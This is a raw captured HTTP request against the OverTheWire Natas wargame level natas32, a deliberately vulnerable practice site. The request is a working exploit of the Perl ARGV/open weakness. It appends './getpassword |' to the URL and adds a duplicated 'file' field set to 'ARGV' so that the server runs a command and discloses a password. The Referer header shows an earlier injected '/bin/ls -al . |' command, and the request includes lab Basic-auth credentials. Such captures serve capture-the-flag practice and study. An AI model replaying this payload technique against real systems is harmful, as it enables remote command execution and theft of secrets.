POST /index.pl?./getpassword%20| HTTP/1.1
Host: natas32.natas.labs.overthewire.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------407458516821869765401909995234
Content-Length: 482
Origin: http://natas32.natas.labs.overthewire.org
Authorization: Basic bmF0YXMzMjpZcDVmZnlmbUVkanZUT3dwTjVIQ3ZoN0N0Z2Y5ZW0zRw==
Connection: close
Referer: http://natas32.natas.labs.overthewire.org/index.pl?/bin/ls%20-al%20.%20|
Cookie: __utma=176859643.1399902936.1680016716.1680113390.1680123341.7; __utmz=176859643.1680101791.5.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __utmc=176859643; __utmb=176859643.3.10.1680123341; __utmt=1
Upgrade-Insecure-Requests: 1

-----------------------------407458516821869765401909995234
Content-Disposition: form-data; name="file"

ARGV
-----------------------------407458516821869765401909995234
Content-Disposition: form-data; name="file"; filename="simpletext.txt"
Content-Type: text/plain

test ??
how:123
what_123
-----------------------------407458516821869765401909995234
Content-Disposition: form-data; name="submit"

Upload
-----------------------------407458516821869765401909995234--
